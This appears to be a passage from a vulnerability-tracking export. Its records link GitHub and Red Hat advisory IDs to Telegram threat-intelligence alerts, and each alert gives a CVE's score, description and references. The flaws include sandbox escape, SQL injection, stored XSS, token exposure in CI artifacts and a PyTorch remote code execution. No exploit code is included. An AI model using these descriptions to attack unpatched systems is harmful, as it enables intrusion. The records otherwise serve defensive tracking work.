"vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4MQ4-7RW3-VM5J", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/12345", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-51661\n\ud83d\udd25 CVSS Score: 8.4 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: Wasmer is a WebAssembly runtime that enables containers to run anywhere: from Desktop to the Cloud, Edge and even the browser. Wasm programs can access the filesystem outside of the sandbox. Service providers running untrusted Wasm code on Wasmer can unexpectedly expose the host filesystem. This vulnerability has been patched in version 4.2.4.\n\ud83d\udccf Published: 2023-12-22T14:54:23.103Z\n\ud83d\udccf Modified: 2025-04-17T20:29:41.019Z\n\ud83d\udd17 References:\n1. https://github.com/wasmerio/wasmer/security/advisories/GHSA-4mq4-7rw3-vm5j\n2. https://github.com/wasmerio/wasmer/issues/4267\n3. https://github.com/wasmerio/wasmer/commit/4d63febf9d8b257b0531963b85df48d45d0dbf3c", "creation_timestamp": "2025-04-17T20:58:12.000000Z"}, {"uuid": "267c1aa7-b750-4bf9-b02e-d682a56e1f66", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-43W4-4J3C-JX29", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/12351", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-52084\n\ud83d\udd25 CVSS Score: 2 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:N/I:L/A:N)\n\ud83d\udd39 Description: Winter is a free, open-source content management system. Prior to 1.2.4, Users with access to backend forms that include a ColorPicker FormWidget can provide a value that would then be rendered unescaped in the backend form, potentially allowing for a stored XSS attack. This issue has been patched in v1.2.4.\n\ud83d\udccf Published: 2023-12-28T22:15:59.952Z\n\ud83d\udccf Modified: 2025-04-17T20:27:13.689Z\n\ud83d\udd17 References:\n1. https://github.com/wintercms/winter/security/advisories/GHSA-43w4-4j3c-jx29\n2. https://github.com/wintercms/winter/commit/517f65dfae679b57575b047de13c5af48915a5ba", "creation_timestamp": "2025-04-17T20:58:20.000000Z"}, {"uuid": "976bc121-a265-4ac8-aca7-5674003e6e0f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2PRX-RGR7-HQ5F", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/12467", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-30158\n\ud83d\udd25 CVSS Score: 7.1 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H)\n\ud83d\udd39 Description: NamelessMC is a free, easy to use &amp; powerful website software for Minecraft servers. In version 2.1.4 and prior, the forum allows users to post iframe elements inside forum topics/comments/feed with no restriction on the iframe's width and height attributes. This allows an authenticated attacker to perform a UI-based denial of service (DoS) by injecting oversized iframes that block the forum UI and disrupt normal user interactions. This issue has been patched in version 2.2.0.\n\ud83d\udccf Published: 2025-04-18T15:50:49.309Z\n\ud83d\udccf Modified: 2025-04-18T15:50:49.309Z\n\ud83d\udd17 References:\n1. https://github.com/NamelessMC/Nameless/security/advisories/GHSA-2prx-rgr7-hq5f\n2. https://github.com/NamelessMC/Nameless/commit/caa42a975338a13fbc1658e8c440108f16135643\n3. https://github.com/NamelessMC/Nameless/releases/tag/v2.2.0", "creation_timestamp": "2025-04-18T15:58:46.000000Z"}, {"uuid": "4b0f3415-fe3a-4c12-98e6-8d2fb0188081", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8VCG-CFXJ-P5M3", "type": "published-proof-of-concept", "source": "Telegram/JTVCavw9eJ9TxCCdyOAXizVyk-oL-OSGJyunth0Lc0NQQjM", "content": "", "creation_timestamp": "2026-01-02T18:48:07.000000Z"}, {"uuid": "c3535a13-314b-4aff-ae5c-b1f6e59d6e38", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XQQC-C5GW-C5R5", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/12492", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-23507\n\ud83d\udd25 CVSS Score: 5.4 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N)\n\ud83d\udd39 Description: Tendermint is a high-performance blockchain consensus engine for Byzantine fault tolerant applications. Versions prior to 0.28.0 contain a potential attack via Improper Verification of Cryptographic Signature, affecting anyone using the tendermint-light-client and related packages to perform light client verification (e.g. IBC-rs, Hermes). The light client does not check that the chain IDs of the trusted and untrusted headers match, resulting in a possible attack vector where someone who finds a header from an untrusted chain that satisfies all other verification conditions (e.g. enough overlapping validator signatures) could fool a light client. The attack vector is currently theoretical, and no proof-of-concept exists yet to exploit it on live networks. This issue is patched in version 0.28.0. There are no workarounds.\n\ud83d\udccf Published: 2022-12-15T00:01:04.540Z\n\ud83d\udccf Modified: 2025-04-18T15:59:54.978Z\n\ud83d\udd17 References:\n1. https://github.com/informalsystems/tendermint-rs/security/advisories/GHSA-xqqc-c5gw-c5r5", "creation_timestamp": "2025-04-18T16:59:06.000000Z"}, {"uuid": "ae605575-1ff7-4b8c-bcda-7afb03036feb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5984-MHCP-CQ2X", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/12489", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-32389\n\ud83d\udd25 CVSS Score: 8.6 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:L/SI:L/SA:N)\n\ud83d\udd39 Description: NamelessMC is a free, easy to use &amp; powerful website software for Minecraft servers. Prior to version 2.1.4, NamelessMC is vulnerable to SQL injection by providing an unexpected square bracket GET parameter syntax. Square bracket GET parameter syntax refers to the structure `?param[0]=a&amp;param[1]=b&amp;param[2]=c` utilized by PHP, which is parsed by PHP as `$_GET['param']` being of type array. This issue has been patched in version 2.1.4.\n\ud83d\udccf Published: 2025-04-18T15:56:39.962Z\n\ud83d\udccf Modified: 2025-04-18T16:24:24.300Z\n\ud83d\udd17 References:\n1. https://github.com/NamelessMC/Nameless/security/advisories/GHSA-5984-mhcp-cq2x\n2. https://github.com/NamelessMC/Nameless/commit/02c81c7c45b98fad1ebe3bc085efae18aec4566f\n3. https://github.com/NamelessMC/Nameless/releases/tag/v2.1.4", "creation_timestamp": "2025-04-18T16:58:59.000000Z"}, {"uuid": "f1c691c1-b166-41a1-a4f7-761a1166f056", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-67FX-WX78-JX33", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/12496", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-23526\n\ud83d\udd25 CVSS Score: 5.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L)\n\ud83d\udd39 Description: Helm is a tool for managing Charts, pre-configured Kubernetes resources. Versions prior to 3.10.3 are subject to NULL Pointer Dereference in the_chartutil_ package that can cause a segmentation violation. The _chartutil_ package contains a parser that loads a JSON Schema validation file. For example, the Helm client when rendering a chart will validate its values with the schema file. The _chartutil_ package parses the schema file and loads it into structures Go can work with. Some schema files can cause array data structures to be created causing a memory violation. Applications that use the _chartutil_ package in the Helm SDK to parse a schema file can suffer a Denial of Service when that input causes a panic that cannot be recovered from. Helm is not a long running service so the panic will not affect future uses of the Helm client. This issue has been patched in 3.10.3. SDK users can validate schema files that are correctly formatted before passing them to the _chartutil_ functions.\n\ud83d\udccf Published: 2022-12-15T00:43:40.383Z\n\ud83d\udccf Modified: 2025-04-18T15:58:33.758Z\n\ud83d\udd17 References:\n1. https://github.com/helm/helm/security/advisories/GHSA-67fx-wx78-jx33\n2. https://github.com/helm/helm/commit/bafafa8bb1b571b61d7a9528da8d40c307dade3d", "creation_timestamp": "2025-04-18T16:59:12.000000Z"}, {"uuid": "89cacad6-bc44-4a7f-a989-7f82f117a15c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5993-7P27-66G5", "type": "published-proof-of-concept", "source": "Telegram/SIlHdnSWOhxtT164bo5OUY813qzBP_Wb650GYgkhFr1n0D8", "content": "", "creation_timestamp": "2026-01-02T18:48:41.000000Z"}, {"uuid": "1b379a8f-0dd9-499f-a159-99c706192372", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-F43R-CC68-GPX4", "type": "published-proof-of-concept", "source": "Telegram/SIlHdnSWOhxtT164bo5OUY813qzBP_Wb650GYgkhFr1n0D8", "content": "", "creation_timestamp": "2026-01-02T18:48:41.000000Z"}, {"uuid": "25f0cdc1-cbf3-4348-9f03-5d6300fb72e8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JP6M-V4GW-5VGP", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/12419", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-32790\n\ud83d\udd25 CVSS Score: 6.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L)\n\ud83d\udd39 Description: Dify is an open-source LLM app development platform. In versions 0.6.8 and prior, a vulnerability was identified in the DIFY AI where normal users are improperly granted permissions to export APP DSL. The feature in '/export' should only allow administrator users to export DSL. A patched version has not been released. A workaround for this vulnerability involves updating the access control mechanisms to enforce stricter user role permissions and implementing role-based access controls (RBAC) to ensure that only users with admin privileges can export the APP DSL. This vulnerability is fixed in 0.6.13.\n\ud83d\udccf Published: 2025-04-18T12:15:11.487Z\n\ud83d\udccf Modified: 2025-04-18T12:43:23.481Z\n\ud83d\udd17 References:\n1. https://github.com/langgenius/dify/security/advisories/GHSA-jp6m-v4gw-5vgp\n2. https://github.com/langgenius/dify/pull/5841\n3. https://github.com/langgenius/dify/commit/59ad091e69736bc9dc1a3bace62ec0a232346246", "creation_timestamp": "2025-04-18T12:58:23.000000Z"}, {"uuid": "f64943ed-3c6a-457d-be10-90ed3adfbd71", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-MG2H-6X62-WPWC", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/12494", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-32442\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N)\n\ud83d\udd39 Description: Fastify is a fast and low overhead web framework, for Node.js. In versions 5.0.0 to 5.3.0, applications that specify different validation strategies for different content types have a possibility to bypass validation by providing a _slightly altered_ content type such as with different casing or altered whitespacing before `;`. This issue has been patched in version 5.3.1. A workaround involves not specifying individual content types in the schema.\n\ud83d\udccf Published: 2025-04-18T15:59:06.670Z\n\ud83d\udccf Modified: 2025-04-18T15:59:06.670Z\n\ud83d\udd17 References:\n1. https://github.com/fastify/fastify/security/advisories/GHSA-mg2h-6x62-wpwc\n2. https://github.com/fastify/fastify/commit/436da4c06dfbbb8c24adee3a64de0c51e4f47418\n3. https://hackerone.com/reports/3087928", "creation_timestamp": "2025-04-18T16:59:07.000000Z"}, {"uuid": "d15bc05d-5563-49bf-95cd-e9278720645b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6RX9-889Q-VV2R", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/12493", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-23524\n\ud83d\udd25 CVSS Score: 5.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L)\n\ud83d\udd39 Description: Helm is a tool for managing Charts, pre-configured Kubernetes resources. Versions prior to 3.10.3 are subject to Uncontrolled Resource Consumption, resulting in Denial of Service. Input to functions in the _strvals_ package can cause a stack overflow. In Go, a stack overflow cannot be recovered from. Applications that use functions from the _strvals_ package in the Helm SDK can have a Denial of Service attack when they use this package and it panics. This issue has been patched in 3.10.3. SDK users can validate strings supplied by users won't create large arrays causing significant memory usage before passing them to the _strvals_ functions.\n\ud83d\udccf Published: 2022-12-15T00:28:34.540Z\n\ud83d\udccf Modified: 2025-04-18T15:59:27.542Z\n\ud83d\udd17 References:\n1. https://github.com/helm/helm/security/advisories/GHSA-6rx9-889q-vv2r", "creation_timestamp": "2025-04-18T16:59:07.000000Z"}, {"uuid": "6e2f6e06-7735-4863-91a2-ff815d794f57", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-M5PX-PWQ3-4P5M", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/12471", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-27599\n\ud83d\udd25 CVSS Score: 6.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N)\n\ud83d\udd39 Description: Element X Android is a Matrix Android Client provided by element.io. Prior to version 25.04.2, a crafted hyperlink on a webpage, or a locally installed malicious app, can force Element X up to version 25.04.1 to load a webpage with similar permissions to Element Call and automatically grant it temporary access to microphone and camera. This issue has been patched in version 25.04.2.\n\ud83d\udccf Published: 2025-04-18T15:49:11.899Z\n\ud83d\udccf Modified: 2025-04-18T15:49:11.899Z\n\ud83d\udd17 References:\n1. https://github.com/element-hq/element-x-android/security/advisories/GHSA-m5px-pwq3-4p5m\n2. https://github.com/element-hq/element-x-android/commit/dc058544d7e693c04298191c1aadd5b39c9be52e\n3. https://github.com/element-hq/element-x-android/releases/tag/v25.04.2", "creation_timestamp": "2025-04-18T15:58:53.000000Z"}, {"uuid": "359137b5-7c41-4249-b123-440e366cfb90", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-GPJJ-F76M-9X3Q", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/12538", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-32953\n\ud83d\udd25 CVSS Score: 8.7 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:H)\n\ud83d\udd39 Description: z80pack is a mature emulator of multiple platforms with 8080 and Z80 CPU. In version 1.38 and prior, the `makefile-ubuntu.yml` workflow file uses `actions/upload-artifact@v4` to upload the `z80pack-ubuntu` artifact. This artifact is a zip of the current directory, which includes the automatically generated `.git/config` file containing the run's GITHUB_TOKEN. Seeing as the artifact can be downloaded prior to the end of the workflow, there is a few seconds where an attacker can extract the token from the artifact and use it with the Github API to push malicious code or rewrite release commits in your repository. This issue has been fixed in commit bd95916.\n\ud83d\udccf Published: 2025-04-18T20:42:46.655Z\n\ud83d\udccf Modified: 2025-04-18T20:42:46.655Z\n\ud83d\udd17 References:\n1. https://github.com/udo-munk/z80pack/security/advisories/GHSA-gpjj-f76m-9x3q\n2. https://github.com/udo-munk/z80pack/commit/1e06c2fe498ca772002b5c4f6f9e3085061e47da\n3. https://github.com/udo-munk/z80pack/commit/836c2e37b54f86bb4bed9e1406b67e52aa52308d\n4. https://github.com/udo-munk/z80pack/commit/95535987d690bd20849fbf143f267283f0e2db91\n5. https://github.com/udo-munk/z80pack/commit/bd9591615ae7b1e6229aa60a485447441c4a0c15", "creation_timestamp": "2025-04-18T20:59:20.000000Z"}, {"uuid": "270516a6-7872-4dc3-bbf3-014c234570d3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-53Q9-R3PM-6PQ6", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/12473", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-32434\n\ud83d\udd25 CVSS Score: 9.3 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N)\n\ud83d\udd39 Description: PyTorch is a Python package that provides tensor computation with strong GPU acceleration and deep neural networks built on a tape-based autograd system. In version 2.5.1 and prior, a Remote Command Execution (RCE) vulnerability exists in PyTorch when loading a model using torch.load with weights_only=True. This issue has been patched in version 2.6.0.\n\ud83d\udccf Published: 2025-04-18T15:48:18.851Z\n\ud83d\udccf Modified: 2025-04-18T15:48:18.851Z\n\ud83d\udd17 References:\n1. https://github.com/pytorch/pytorch/security/advisories/GHSA-53q9-r3pm-6pq6", "creation_timestamp": "2025-04-18T15:58:55.000000Z"}, {"uuid": "c37a51a8-2e6b-4af7-9ef6-e9d7c68b7eed", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HQCX-598M-PJQ4", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/12488", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-32796\n\ud83d\udd25 CVSS Score: 6.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: Dify is an open-source LLM app development platform. Prior to version 0.6.12, a vulnerability was identified in the DIFY where normal users can enable or disable apps through the API, even though the web UI button for this action is disabled and normal users are not permitted to make such changes. This access control flaw allows non-admin users to make unauthorized changes, which can disrupt the functionality and availability of the APPS. This issue has been patched in version 0.6.12. A workaround for this vulnerability involves updating the API access control mechanisms to enforce stricter user role permissions and implementing role-based access controls (RBAC) to ensure that only users with admin privileges can send enable or disable requests for apps.\n\ud83d\udccf Published: 2025-04-18T16:06:47.577Z\n\ud83d\udccf Modified: 2025-04-18T16:36:51.064Z\n\ud83d\udd17 References:\n1. https://github.com/langgenius/dify/security/advisories/GHSA-hqcx-598m-pjq4\n2. https://github.com/langgenius/dify/pull/5266", "creation_timestamp": "2025-04-18T16:58:58.000000Z"}, {"uuid": "f833cdb3-2fc8-4e27-8680-a93a138f6643", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-GG5W-M2VW-VMMJ", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/12487", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-32795\n\ud83d\udd25 CVSS Score: 6.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N)\n\ud83d\udd39 Description: Dify is an open-source LLM app development platform. Prior to version 0.6.12, a vulnerability was identified in the DIFY where normal users are improperly granted permissions to edit APP names, descriptions and icons. This access control flaw allows non-admin users to modify app details, despite being restricted from viewing apps, which poses a security risk to the integrity of the application. This issue has been patched in version 0.6.12. A workaround for this vulnerability involves updating the access control mechanisms to enforce stricter user role permissions and implementing role-based access controls (RBAC) to ensure that only users with admin privileges can modify app details.\n\ud83d\udccf Published: 2025-04-18T16:05:11.644Z\n\ud83d\udccf Modified: 2025-04-18T16:37:49.329Z\n\ud83d\udd17 References:\n1. https://github.com/langgenius/dify/security/advisories/GHSA-gg5w-m2vw-vmmj\n2. https://github.com/langgenius/dify/pull/5266", "creation_timestamp": "2025-04-18T16:58:57.000000Z"}, {"uuid": "3272e374-65a0-4381-a868-e2a7eb321467", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WCJ4-JW5J-44WH", "type": "published-proof-of-concept", "source": "Telegram/y7Lvi2tF85NLRLdqVIoPmFTdEgasWBAb1_B7Rq-PCy88P3M", "content": "", "creation_timestamp": "2026-01-02T18:50:07.000000Z"}, {"uuid": "eea9343d-2961-4f91-b33a-a35f5c9e42db", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8C28-5MP7-V24H", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/12668", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-23500\n\ud83d\udd25 CVSS Score: 5.9 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: TYPO3 is an open source PHP based web content management system. In versions prior to 9.5.38, 10.4.33, 11.5.20, and 12.1.1, requesting invalid or non-existing resources via HTTP triggers the page error handler, which again could retrieve content to be shown as an error message from another page. This leads to a scenario in which the application is calling itself recursively - amplifying the impact of the initial attack until the limits of the web server are exceeded. This vulnerability is very similar, but not identical, to the one described in CVE-2021-21359. This issue is patched in versions 9.5.38 ELTS, 10.4.33, 11.5.20 or 12.1.1.\n\ud83d\udccf Published: 2022-12-14T07:07:05.039Z\n\ud83d\udccf Modified: 2025-04-21T14:54:11.819Z\n\ud83d\udd17 References:\n1. https://github.com/TYPO3/typo3/security/advisories/GHSA-8c28-5mp7-v24h", "creation_timestamp": "2025-04-21T15:02:46.000000Z"}, {"uuid": "8db5c55c-3b78-4719-ae84-51ed84ee8a33", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-83JG-M2PM-4JXJ", "type": "seen", "source": "Telegram/tvXCLGUilOvMaw6u2Ka_lL_W3ojA0JbLTE88GmCok0Ef1Hc", "content": "", "creation_timestamp": "2026-01-02T18:50:33.000000Z"}, {"uuid": "7ba31326-74f6-4108-9832-13c9c25eef7a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8JV7-77JW-H646", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/12504", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-31120\n\ud83d\udd25 CVSS Score: 5.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N)\n\ud83d\udd39 Description: NamelessMC is a free, easy to use &amp; powerful website software for Minecraft servers. In version 2.1.4 and prior, an insecure view count mechanism in the forum page allows an unauthenticated attacker to artificially increase the view count. The application relies on a client-side cookie (nl-topic-[tid]) (or session variable for guests) to determine if a view should be counted. When a client does not provide the cookie, every page request increments the counter, leading to incorrect view metrics. This issue has been patched in version 2.2.0.\n\ud83d\udccf Published: 2025-04-18T15:52:57.791Z\n\ud83d\udccf Modified: 2025-04-18T15:52:57.791Z\n\ud83d\udd17 References:\n1. https://github.com/NamelessMC/Nameless/security/advisories/GHSA-8jv7-77jw-h646\n2. https://github.com/NamelessMC/Nameless/commit/9b112c0beab346a38b6f5a51e7773b38c6fc52e7\n3. https://github.com/NamelessMC/Nameless/releases/tag/v2.2.0", "creation_timestamp": "2025-04-18T16:59:24.000000Z"}, {"uuid": "0c3e497d-4465-44c0-9a06-caa7924124fa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-C5WX-6C2C-F7RM", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/12525", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-23503\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: TYPO3 is an open source PHP based web content management system. Versions prior to 8.7.49, 9.5.38, 10.4.33, 11.5.20, and 12.1.1 are vulnerable to Code Injection. Due to the lack of separating user-submitted data from the internal configuration in the Form Designer backend module, it is possible to inject code instructions to be processed and executed via TypoScript as PHP code. The existence of individual TypoScript instructions for a particular form item and a valid backend user account with access to the form module are needed to exploit this vulnerability. This issue is patched in versions 8.7.49 ELTS, 9.5.38 ELTS, 10.4.33, 11.5.20, 12.1.1.\n\ud83d\udccf Published: 2022-12-14T07:51:03.984Z\n\ud83d\udccf Modified: 2025-04-18T18:24:23.086Z\n\ud83d\udd17 References:\n1. https://github.com/TYPO3/typo3/security/advisories/GHSA-c5wx-6c2c-f7rm", "creation_timestamp": "2025-04-18T18:58:47.000000Z"}, {"uuid": "631969fa-8d6a-44aa-a272-193f5bb2557c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-52H2-M2CF-9JH6", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/12524", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-23523\n\ud83d\udd25 CVSS Score: 4 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L)\n\ud83d\udd39 Description: In versions prior to 0.8.1, the linux-loader crate uses the offsets and sizes provided in the ELF headers to determine the offsets to read from. If those offsets point beyond the end of the file this could lead to Virtual Machine Monitors using the `linux-loader` crate entering an infinite loop if the ELF header of the kernel they are loading was modified in a malicious manner. This issue has been addressed in 0.8.1. The issue can be mitigated by ensuring that only trusted kernel images are loaded or by verifying that the headers do not point beyond the end of the file.\n\ud83d\udccf Published: 2022-12-13T07:41:47.047Z\n\ud83d\udccf Modified: 2025-04-18T18:28:35.965Z\n\ud83d\udd17 References:\n1. https://github.com/rust-vmm/linux-loader/security/advisories/GHSA-52h2-m2cf-9jh6\n2. https://github.com/rust-vmm/linux-loader/pull/125", "creation_timestamp": "2025-04-18T18:58:45.000000Z"}, {"uuid": "020423c5-3401-4c36-9bbf-82cf3bfedc82", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:7437", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/16274", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-52616\n\ud83d\udd25 CVSS Score: 5.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N)\n\ud83d\udd39 Description: A flaw was found in the Avahi-daemon, where it initializes DNS transaction IDs randomly only once at startup, incrementing them sequentially after that. This predictable behavior facilitates DNS spoofing attacks, allowing attackers to guess transaction IDs.\n\ud83d\udccf Published: 2024-11-21T20:41:11.636Z\n\ud83d\udccf Modified: 2025-05-13T23:50:12.711Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:7437\n2. https://access.redhat.com/security/cve/CVE-2024-52616\n3. https://bugzilla.redhat.com/show_bug.cgi?id=2326429", "creation_timestamp": "2025-05-14T00:31:43.000000Z"}, {"uuid": "d37c4f7b-e3d6-42b5-8321-77ad885a965c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": 